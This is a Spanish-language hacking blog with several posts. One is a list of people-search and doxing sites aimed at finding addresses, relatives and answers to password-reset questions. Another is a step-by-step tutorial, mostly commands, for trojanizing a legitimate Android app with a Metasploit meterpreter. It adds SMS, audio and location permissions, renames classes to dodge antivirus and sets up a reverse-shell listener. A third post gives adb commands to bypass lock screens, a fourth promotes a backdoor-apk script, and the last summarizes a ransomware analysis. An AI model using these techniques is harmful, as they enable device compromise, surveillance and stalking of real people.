HACKER ANGELWHITE GALC

sábado, 7 de enero de 2017

Enlaces para Doxing, Personal OSINT, perfiles, Huella, Cibernético

 
Tal vez usted está haciendo una prueba de intrusión y necesita información antes de llevar a cabo un ataque de ingeniería social. Tal vez lo que desea es ver si alguien que lo contactó en línea es de fiar, o conocer qué datos suyos es por ahí para que otros puedan encontrar.
 
Aquí hay una colección de sitios I y otros han encontrado útil para encontrar datos sobre una persona u organización. Yo les estoy publicando sobre todo por lo que no los pierda, y por lo que tengo un lugar para apuntar a otros a cuando preguntan. Si usted tiene ideas para adiciones por favor, póngase en contacto conmigo .
 
Hay herramientas para automatizar algunas de estas tareas, pero hay algo que decir para hacerlo "a mano". Las computadoras son muy buenos para las matemáticas y la automatización, pero la extracción de contexto es un poco más difícil para mis amigos de silicio (y también para mis amigos de silicona). La mente humana puede ser mucho mejor en estas tareas, al menos en algunas mentes. La forma en que tiene que pensar es en la fabricación de conexiones. Una miga de pan de datos lleva a la otra, lo que lleva a la otra y luego otra. Por ejemplo:
  • Encontrar un nombre de usuario lleva a otros perfiles con más datos, esto conduce a un nombre completo, entonces esto podría conducir a una dirección física.
  • Un nombre de usuario puede llevar a las fotografías, lo que podría dar lugar a placas o direcciones físicas.
  • Para los nombres comunes como John Doe añadiendo los intereses de un perfil o un lugar puede conducir a la reducción a los resultados a una persona específica.
Todo es cuestión de hacer las conexiones. Tenga en cuenta, que normalmente se encontrará más información sobre alguien que es Savy tecnología entonces alguien que no lo es. Mi abuela no está en Facebook después de todo.

Por favor, tenga en cuenta que hay un un buen número de problemas comunes de este tipo de sitios de agregación de redes sociales:

1. Algunos sitios comienzan libre, y luego ir pagada. Cuando esto sucede, se obtiene una gran cantidad de información se burla que conducen a las compañías que quieren su tarjeta de crédito. Apestoso!
2. Las personas les gusta crear mashups, pero luego abandonarlos después se acabó la diversión. A continuación, los cambios en la API de back-end, y el sitio ya no funciona. ¿Qué sitios son buenos para una tarea cambia con el tiempo.
3. Algunos pueden pedir las credenciales de red social. Es posible que desee hacer algunas cuentas de usar y tirar sólo para los fines de la utilización de estas herramientas.  
Esta página necesitará t ser actualizado con el tiempo, así que por favor enviar sugerencias.
 
Búsqueda general:

Google
Duh. Asegúrese de que conoce a sus operadores para conseguir que la mayor parte de él sin embargo. http://www.google.com Bing Ok, Bing se burlado de muchos como un "también corrió" junto a Google, pero tiene algunas características impresionantes. Muchos de los mismos operadores de Google trabajan aquí, pero realmente me cavar que sólo tiene Bing es IP: para encontrar otros sitios web en la misma IP (cruz servidor compartido referencia a la diversión). http://www.bing.com/ 

redes, de dominio y de información de enrutamiento

La mayor parte de esta página cubrirá encontrar información sobre las personas de las redes sociales, y no de la red de redes. Sin embargo, a veces sabiendo que es dueño de una red / dominio / IP es un gran lugar por lo que empezar, y la gente deja las cosas en sus registros Whois que pueden revelar una gran cantidad de pistas útiles. Hay tantos sitios que ofrecen este tipo de servicios, pero sólo cubrirán mis favoritos.
RobTex
Mientras que la interfaz es un poco raro en mi opinión, este es un gran sitio para hacer DNS inverso las operaciones de búsqueda de direcciones IP, agarrando contactos Whois, y encontrar otra información general acerca de un nombre IP o dominio. http://www.robtex.com ServerSniff Éste es una especie de bola impar. Un montón de sitios ofrecen información Whois, éste va a herramientas más exóticas. Usted realmente tiene que jugar sólo con él para encontrar todas sus características. A veces es difícil recordar qué opción es dónde. Sólo algunas de las herramientas son: ICMP y TCP trazas de ruta, información SSL, informes de DNS y nombres de host en una dirección IP compartida. Es bueno que te hicieran algo de la reconstrucción para usted si usted no desea utilizar un proxy y no desea que su dirección IP aparezca en los registros del objetivo. http://serversniff.net 

Buscando perfiles en una persona OSINT Bookmarklets v0.2 

 http://illmob.org/bookmark.html página fresca de Will Genovese donde se puede búsqueda del teléfono, IP, Host, correo electrónico, S / N , Nombre, Dirección y datos de forma automatizada.

Las raíces de los alces
http://www.mooseroots.com
sitio impresionante, especialmente para estos sub-sitios
http://birth-records.mooseroots.com/
http://marriage-divorce-records.mooseroots.com/
que son excelentes para Delinear las relaciones familiares para las preguntas de restablecimiento de contraseña.

Revisión de Antecedentes avanzadas
 
para la búsqueda de direcciones de calles y familiares esta es la bomba. Hasta ahora, no me ha fallado en la búsqueda de direcciones de calles si tengo una vaga idea en la que alguien vive
http://www.advancedbackgroundchecks.com
 
Usted peek 
 
La interfaz es limpia, y mientras que enlaza fuera a pagar los sitios que al menos le da información real en primer lugar. Me parece recordar que sea mejor en el pasado. http://www.peekyou.com
  Lullar Búsqueda de una persona mediante correo electrónico | Nombre | nombre de usuario. No hay tantos resultados devueltos como en otros sitios, pero lo que le da una agradable es limpio, con un vistazo a todos los sitios de pago en el camino. http://com.lullar.com/ Comprobar nombres de usuario Ok, tengo que decir que me encanta este sitio. Puede que no han sido pensada como un sitio para el perfilado, pero funciona bien para esa tarea. Todos hablamos de reutilización de contraseñas de ser un problema, pero para el perfil de alguien nombre de usuario de la reutilización es donde se encuentra en. Este sitio le permite buscar 160 sitios de redes sociales para ver si se toma un nombre de pantalla. A partir de ahí, se puede ir a ver lo que está en un perfil de personas en esos sitios a mano. Guarda algunos versos que controla tiempo para una cuenta en cada sitio usted mismo, pero todavía hay un montón de trabajo para que usted pueda hacer después.   http://www.checkusernames.com/ KnowEm similares para ver los nombres de usuario anterior, sino que alega para comprobar más de 500 sitios para ver si se toma un nombre de usuario dado. http://knowem.com Búsqueda incremental Este solía ser Spock ( "único punto de contacto (por) la palabra clave"). No estoy seguro cuando cambió, mi conjetura es después de Intelius los compró. Puede buscar en Nombre | Teléfono | Emai | lScreen Nombre. Bueno para la búsqueda de familiares, supongo. Una vez que encuentre un nombre de un nombre de usuario que debe dar un paso atrás y la búsqueda de ella, así como los resultados varían mucho. Parece que conducir sobre todo a la gente a pagar dinero para Intelius. http://www.isearch.com Pipl Puede buscar Nombre | Correo electrónico | Nombre de usuario | Teléfono y encontrar resultados relacionados. Los resultados pueden ser muy ruidoso, con enlaces a un montón de sitios de pago (Spokeo, Intellus, etc.), pero si usted está dispuesto a ordenar a pesar de la porquería que es bastante agradable. Me gusta lo que muestra de los registros públicos, los perfiles de Amazon, y las redes sociales. http://www.pipl.com 123 personas al igual que todos los anteriores. Enlaces fuera a un montón de otros recursos, algunos pagan y otros no. http://www.123people.com Spokeo Ok, Spokeo tiene algunas características de diseño agradable, pero es una tomadura de pelo información. En ella se informa "hey encontrado algo" mucho, pero usted tiene que pagar por los resultados. Al igual que la delincuencia, no pago. Aún así, puede ser agradable como punto de partida para dirigir que en otros lugares. Por ejemplo, una vez que conocer a alguien tiene un perfil en Facebook, sólo puede ir a Facebook. http://www.spokeo.com WebMii Permite que se ve a la gente por su nombre o una palabra clave (prueba nombre de usuario como una palabra clave). http://webmii.com/ información ampliar parece bastante bueno para encontrar a alguien en donde trabaja. Me pregunto qué parte de la información es sólo de LinkedIn, y la cantidad de otras fuentes? Mirando al lado del otro, información ampliar parece aumentar con los datos de otras fuentes. http://www.zoominfo.com.

 Geo Localización Android mapa Si tiene la dirección MAC del router (que sucede) Samy tiene una herramienta para tratar de geolocalizar que la base de lo que Google sabe. Parece probable que Google está utilizando teléfono Android para hacer un wardrive distribuida para complementar sus datos de vista de tranvías. http://samy.pl/androidmap Bing Mapa Aplicaciones Las aplicaciones de los mapas son un buen extra para tener, pero se necesita Silverlight y que no parecen estables a menos que usted está utilizando Internet Explorer (que figura). Mira el mapa aplicación de Twitter. http://www.bing.com/maps/ Twitter Mapa También agradable para ver donde la gente está twitteando de, pero no tan elegante o tan amplia como la aplicación de Bing. http://twittermap.appspot.com/~~number=plural 

 otras rarezas

411
He tenido buena suerte con el uso de este para encontrar direcciones y vecinos.
http://www.411.com/
Google
Me imagino mayoría de la gente sabe acerca de Google, pero ¿sabía usted que puede subir imágenes (o arrastrar y soltar) para encontrar resultados similares? Bueno para la búsqueda de perfiles con diferentes nombres. Estaño de ojos es similar, pero no parece cubrir la mayor cantidad.
http://images.google.com/
Estaño de ojos
que se ha encontrado una foto de alguien, y se preguntó si es que existía en otros lugares? Estaño de ojos, y es complemento del navegador, permiten elegir una imagen y encontrar otros similares en línea, incluso los que se han comprado en serio. Desafortunadamente, la base de datos parece pequeño. Mi esperanza sería ir a un perfil de red social, haga clic derecho en una imagen sólo conozco el nombre de usuario, y luego encontrar otros perfiles con un nombre real y mejor información. Hasta el momento, es en su mayoría ha sido útil para conocer "quién es este actor / modelo", pero quizás en el futuro será mejor. http://tineye.com libro abierto no debe amar a las personas que dejan comentarios de Facebook abierta al mundo. Incluso si una persona es consciente de la privacidad, un amigo de ellos no puede ser, y podía hacer comentarios sobre ellos. http://youropenbook.org/

Abrir Búsqueda de Estado de
 
libro abierto parece haber desaparecido, y el Open de Búsqueda de Estado parece ser la mejor alternativa.
http://openstatussearch.com/

Pico Niebla
 
puede encontrar algo bueno, puede encontrar algo que te marca de por vida. http://picfog.com páginas blancas Búsqueda de Vecinos podría ser útil si necesita SE alguien cerca. http://www.whitepages.com/find_neighbors

Yasni
 
he tenido bastante buena suerte usando esta información para raspar en las personas. http://www.yasni.com Archive.org Wayback Machine veces alguien deja caer sus documentos, pero los elimina. La Wayback Machine puede ayudar a encontrar la información borrada. http://www.archive.org/web/web.php de lectora Tal vez los mensajes de persona en algunos foros con un nombre de usuario dado? Podría dar lugar a información útil. http://boardreader.com Omgili Otra búsqueda bordo, como el de arriba. http://omgili.com 

Herramientas



Ok, no se trata de sitios web, pero maldita herramientas útiles que tiran de recursos web.

Maltego
ingeniosa herramienta, y me gusta la forma en que se dibuja conexiones entre entidades como nombre, dominio, direcciones de correo electrónico, etc., bueno para la construcción de un mapa mental de cómo las cosas están relacionadas. Yo prefiero hacer cosas a mano para aclarar los falsos positivos e interpretar los datos. Es probable que tenga que registrarse para las claves API para obtener el máximo provecho de ella. http://www.paterva.com NetGlub Esto podría algún día ser un sustituto de código abierto para Maltego, pero ahora parece casi imposible de conseguir trabajo. http://www.netglub.org/ Foca realmente me gusta esta herramienta. Se puede hacer búsquedas de formatos de documentos comunes a través de Google y otros motores de búsqueda, y luego descargarlas para extraer metadatos. Encantador. http://www.informatica64.com/DownloadFOCA/ Cree.py Gran herramienta para geolocalizar / seguimiento de Twitter / usuarios de Foursquare. No sólo lo hace con las coordenadas de los mensajes directamente, pero puede apoderarse de ellos a partir de los datos EXIF de las imágenes que enlazan con. http://ilektrojohn.github.com/creepy/~~number=plural 

 sitios que he encontrado tan inútil 

 que ni siquiera voy a unir a ellos, pero quiero que la gente no preguntar "¿por qué no está X Precio ? "en su mayoría se obtiene en esta lista por tener poca o ninguna información gratuita, y sólo conduce a cuestionables para obtener información de pago. ZabaSearch yoname (uso a gustar, ahora los resultados parecen bastante malas) guiño mylife Freeality InfoSpace Gracias a @ davemarcus , @ ukfully , @ Digininja , @ CiphersSon , @ b4seb4nd , @ xillwillx   y pentest-standard.org .

viernes, 30 de diciembre de 2016

Tutorial para modificar un APK añadiéndole un payload msf




Ya sabéis que un APK es un paquete de aplicación de Android (Android Aplication Package) y que es como un .exe de Windows que contiene la aplicación y el instalador en el mismo paquete.

Lo que vamos a ver a continuación es un pequeño tutorial de cómo desempaquetar un .apk, y luego modificarlo añadiendo un componente propio generado por metasploit: un meterpreter para Android. Una vez construyamos ese paquete lo instalaremos en un dispositivo Android consiguiendo que se ejecute la app legítima a la vez que nuestro payload dejando infectado el dispositivo Android.

Cuando nos encontremos ante una auditoría podremos aplicar esta técnica para mostrar las vulnerabilidades de las aplicaciones de Android y recordar que lo importante es no instalar nunca aplicaciones de fuentes poco fiables.

Espero que disfrutéis de este pequeño tutorial tanto como yo lo he disfrutado haciéndolo.


Para empezar generamos el payload para Android con msf:

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk


Luego nos descargamos una apk legítima como por ejemplo 'ccleaner' y decompilamos las dos con apktool:

apktool d -f -o payload meterpreter.apk
apktool d -f -o original ccleaner.apk


Copiamos la carpeta metasploit desde /payload/smali/com/metasploit a /original/smali/com/piriform


Nos vamos la carpeta ./original/ y editamos AndroidManifest.xml (con vim o el editor que queráis)


Buscamos las líneas siguientes que nos servirán como guía para encontrar la ruta a la aplicación principal que es la que nosotros queremos modificar:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

Encima de éstas, encapsulándolas habrá una etiqueta <activity
Nos fijamos en la propiedad Android:name= de esta etiqueta que tendrá una estructura similar a "com.piriform.ccleaner.ui.activity.MainActivity"


Por tanto, ya sabemos el fichero que tenemos que editar de nuestra app legitima (dentro de ./original/smali/), nos vamos a este fichero que será algo parecido a "com/piriform/ccleaner/ui/activity/MainActivity.smali" , es decir, por cada "." Será una "/".

Editamos este fichero .smali y buscamos la línea:

;->onCreate(Landroid/os/Bundle;)V

En la siguiente línea a esta ponemos:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Donde le indicamos que invoque nuestra app que en este caso es el Payload de msf y después continúe con la ejecución normal de la app legitima



Ahora vamos a añadir más permisos a esta app de los que tiene, nos vamos dentro del directorio de la aplicación ./original/ y modificamos el AndoridManifest.xml


Añadiremos los permisos que consideremos, en mi caso puse estos:

<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
 <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
 <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
 <uses-permission android:name="android.permission.SEND_SMS"/>
 <uses-permission android:name="android.permission.RECEIVE_SMS"/>
 <uses-permission android:name="android.permission.RECORD_AUDIO"/>
 <uses-permission android:name="android.permission.CALL_PHONE"/>

Si lo que queremos es ponérselo mas difícil a un antivirus que tuviera el móvil/Tablet podemos hacer lo siguiente dentro del directorio (Esto es opcional) ./original/smali/com/metasploit

sed -i 's/metasploit/conf-schema/g' `rgrep -r metasploit ./* | awk '{print $1}' | cut -d':' -f1`
sed -i 's/Payload/init-conf' `rgrep -r Payload ./* | awk '{print $1}' | cut -d':' -f1`
sed -i 's/payload/init-conf' `rgrep -r payload ./* | awk '{print $1}' | cut -d':' -f1`

Después de eso debemos de cambiar el fichero Payload.smali por init-config.smali


también cambiamos el nombre de /original/smali/com/piriform/metasploit a /original/smali/com/piriform/conf-schema, además de todo eso deberemos de cambiar la línea

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

que hemos puesto antes con el nombre correspondiente:

invoke-static {p0}, Lcom/conf-scheme/stage/init-conf;->start(Landroid/content/Context;)V

yo he puesto estos nombres pero podéis poner lo que queráis, ahora vamos a recompilar otra vez la app, hacemos:

apktool b original/

A continuación comenzará a construir nuestra app.


Dentro del directorio ./original/dist estará nuestra apk construida/compilada.

Ahora toca firmar la apk para que esta sea "legitima" por tanto creamos en nuestro home el directorio .android

mkdir ~/.android

Generamos la key para firmar con:

keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US"

Para firmar con esa firma hacemos:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg SHA1withDSA /home/xarly/original/dist/ccleaner-v1-17-66.apk androiddebugkey

Ahora nos queda dejar a la escucha el metasploit con:

msfconsole
use exploit/multi/handler
set Payload android/meterpreter/reverse_https
set LHOST 192.168.1.135
set LPORT 8181
set ExitOnSession False
exploit -j -z

Ejecutamos la app en el móvil:



Deberíamos ver como se conecta nuestro meterpreter.

Nota: puede que nos pida que habilitemos las opciones de orígenes desconocidos.

Y bueno este es el final del manual , no voy a explicar el funcionamiento del metasploit ya que si lo conoces es el mismo de siempre y sino lo conoces pues te invito a que sigas los pasos y te aventures a realizar el Lab.

También dejo disponible la versión en PDF por si lo deseáis descargar:



Fuentes: 
- http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/ 
- http://www.elandroidelibre.com/2016/02/modifica-y-clona-cualquier-aplicacion-con-apk-editor.html 
- https://ibotpeaches.github.io/Apktool/documentation/

” SOFT RESET ” ADB android – Quitar Patron / Contraseña sin hacer ” HARD RESET “

Tener activado la depuracion en la tablet
1
Conectar tablet a PC
Instalar driver ADB
Abrir el Prompt (Linea de comandos)
Introducir los sig comandos:
c:\android
adb devices
—————–
# Remueve PAtron
adb shell rm /data/system/gesture.key.
# Remueve Contraseña / Pincode talvez
adb shell rm /data/system/password.key  
————
Otra opcion
adb shell
sqlite3 data/data/com.android.providers.settings/databases/settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.exit
# exit
———
—-
Puedes probar
adb reboot recovery
TIP
Si al conectarla no tiene activado ADB, podemos probar INICIANDO LA TABLET EN MODO RECOVERY, en muchos casos esto nos da acceso a ADB.
Se monta la particion DATA o SYSTEM o SDCARD (suele ser diferente en algunos recoverys) y ya podemos usar los comandos para quitar el bloqueo sin borrar/HARDRESET.

Borrando los datos HARD RESET
adb shell wipe data
TIP
Entrando en modo fastboot y eliminando datos
astboot devices
fastboot erase userdata
fastboot erase cache
fastboot reboot
———–
Tambiénes posible empleando alguna de las 7 herramientas listadas Abajo.
Solo instala el driver ADB correspondiente y usa los botones u opciones.
Hay 7 opciones a probar.
1.- “Android Multi Tools v1.02b”.
Opciones 2,3,4,5,8
20130325113245
2.- “GPG Android Tool By GPGIndustries”.


















Tambien esta
3.-  “Justalok”
4.-  “MVS android tool v3.0”
5.-  “Uni-Android Tool V-4.0”
6.-  Fahem Anjum Tools V1.1
7.-  JURASSIC Universal Android Tool v.5.0.2


“Wipe all Rockchip” para Rockhip HardReset para Rockchip ” misc.img ”









—————————–
Activar WIFI via ADB
adb shell svc wifi enable
—–
Activar ADB via recovery
——
Por medio de recovery SOFT RESET – Zip flasheable via CWM/TWRP
http://forum.xda-developers.com/showthread.php?t=2620456

Pattern-Password-disable.zip
LockScreen_Security_bypass.zip
———————————————
Recovery Tablet sin botones de volumen. 
Puedes probar con un teclado USB
POwer + +
power + –
Power + ESC
Power + F2
power + F3
Power + f4
power + Insert / inicio/spr/fin /avpag/repag
Posiblemente alguna de esas combinaciones te permita entrar al recovery
Power + + + HOME
POWER+++ F2
etc
La otra opcion que queda es “flasheando” la tablet con una rom compatible.
*****************
Cuenta de google.
El método varia según el “parche de seguridad” con que cuente el teléfono.

backdoor-apk, un script en bash para añadir un backdoor en un apk fácilmente

Backdoor-apk es un script en bash de Dana James que simplifica el proceso de agregar un backdoor a cualquier archivo APK de Android. Si tienes algunos conocimientos prácticos de Linux, bash, Metasploit, Apktool, el SDK de Android, smali, etc. te recomendamos echar un vistazo al código y descubrirás lo sencillo pero práctico que es:

https://github.com/dana-at-cp/backdoor-apk/blob/master/backdoor-apk/backdoor-apk.sh

Por supuesto, este script se proporciona tal cual, sin garantía de ningún tipo y está destinado únicamente a fines educativos.




Encontrarás el APK recompilado en el directorio 'original/dist'. Instala luego el APK en un dispositivo Android compatible, ejecútalo y maneja la conexión meterpreter a través del script de recursos generado: msfconsole -r backdoor-apk.rc 

Proyectohttps://github.com/dana-at-cp/backdoor-apk



viernes, 9 de diciembre de 2016

Análisis del ransomware Crysis y herramienta de descifrado









 Resultado de imagen para ransomware Crysis

 La industria del ransomware avanza, ya sea porque se modifican  antiguos códigos maliciosos o porque se lanzan nuevos.  Lo que no quedan dudas que es actualmente una de las amenazas que ocupan a los expertos de seguridad.

En esta ocasión, los amigos de WeliveSecurity -en una impecable disección- analizan a CRYSIS; un ransomware que anotan como una clase de código malicioso del tipo Filecoder,  que emplea los cifrados  RSA y AES  para cifrar la información.  Como en casi todos los ransomware, el  objetivo es solicitar el pago de una suma de dinero a cambio de las llaves para recuperar la información.

En cuanto a los medios de propagación, Crysis utiliza diversos vectores de infección que van desde el e-mail hasta las redes sociales.

Por otra parte, los expertos nos dejan gratuitamente la  herramienta para descifrar los archivos y recuperar la información de aquellos que pudieran verse afectados.



Algunas características de Crysis

El ransomware no es más ni menos que un archivo ejecutable que no se encuentra protegido por un packer, lo cual se puede comprobar fácilmente en la cabecera del archivo:


Haciendo un análisis estático podemos llegar a identificar algunas de las principales características de esta familia de códigos maliciosos. Una de las primeras acciones que intentará el ransomware es crear copias de sí mismo en los siguientes directorios, para lograr persistir en el equipo:

* C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
* C:\Windows\System32

El primer directorio es utilizado por el sistema operativo para ejecutar todas las aplicaciones que se encuentren dentro de esta carpeta una vez que haya iniciado sesión el usuario. Claro está que de esta manera la amenaza se asegura cifrar archivos recientemente creados.


En el segundo directorio, el ransomware evita que el usuario se dé cuenta de su presencia, ocultándose en una carpeta nativa y esencial de Windows.

 Underc0de - Hacking y seguridad informática-http://i.imgur.com/eVWmH2L.png

Una de las particularidades que tiene Crysis es eliminar las copias de seguridad creadas por el servicio “Volume Shadow Copy Service”, aplicación incorporada en Windows desde su versión XP.

En pocas palabras, el servicio VSS tiene como tarea crear copias ocultas (shadow copies) de archivos cada vez que ocurra una variación en el sistema como consecuencia de la instalación o actualización de un software. Como podemos ver en la captura, la amenaza ejecutará en consola una serie de comandos específicos para eliminar el backup, en caso de que hubiese.


A continuación, podremos ver cómo continúa el flujo de ejecución del código malicioso, en donde en las primeras instrucciones se encuentran las llamadas a las funciones antes mencionadas. También observamos que en determinados offset se alojan los strings que utilizará para renombrar los archivos cifrados y, además, una lista de extensiones de archivos, lo cual nos da indicios de cuáles son los buscados por esta amenaza para ser cifrados.


Luego se crearán los archivos con los pasos a seguir para recuperar los archivos, lo cual varía dependiendo del ransomware, pero Crysis utilizará archivos de texto e imágenes para guiar al usuario.


Una de las últimas acciones que realiza la amenaza, luego de cifrar la información del usuario, es enviar información como el nombre del equipo y un código identificador, haciendo uso del protocolo HTTP. Cabe destacar que los sitios a los que se conecta la amenaza son sitios comprometidos, por lo general servidores con alguna versión vulnerable de WordPress.


Herramienta para recuperar los archivos cifrados

En el siguiente enlace se encuentra la herramienta de descifrado de Crysis.exe (gratuita).

Indican los expertos que la tool se desarrolló utilizando las claves maestras de descifrado recientemente publicadas.